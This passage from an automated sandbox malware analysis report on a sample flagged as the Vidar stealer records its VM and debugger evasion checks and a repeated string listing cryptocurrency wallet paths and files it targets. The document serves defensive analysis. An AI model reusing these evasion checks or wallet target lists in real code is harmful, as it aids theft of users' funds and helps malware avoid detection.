          Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: file.exe, 00000000.00000002.2492376383.000000000065F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMwareVMware
          Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: file.exe, 00000000.00000002.2492681131.00000000007EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Hides threads from debuggers
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (window names)
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04BB06B2 rdtsc 0_2_04BB06B2
          Source: file.exe, file.exe, 00000000.00000002.2492681131.00000000007EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
          Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Vidar stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6976, type: MEMORYSTR
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: file.exe, 00000000.00000002.2492260129.0000000000191000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: file.exe, 00000000.00000002.2492260129.0000000000191000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *exodus*.*
          Source: file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.jsonH
          Source: file.exe, 00000000.00000002.2492260129.0000000000191000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
          Source: file.exe, 00000000.00000002.2492376383.00000000004EE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
          Source: file.exe, 00000000.00000002.2492376383.00000000004EE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: multidoge.wallet
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: file.exe, 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: |Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
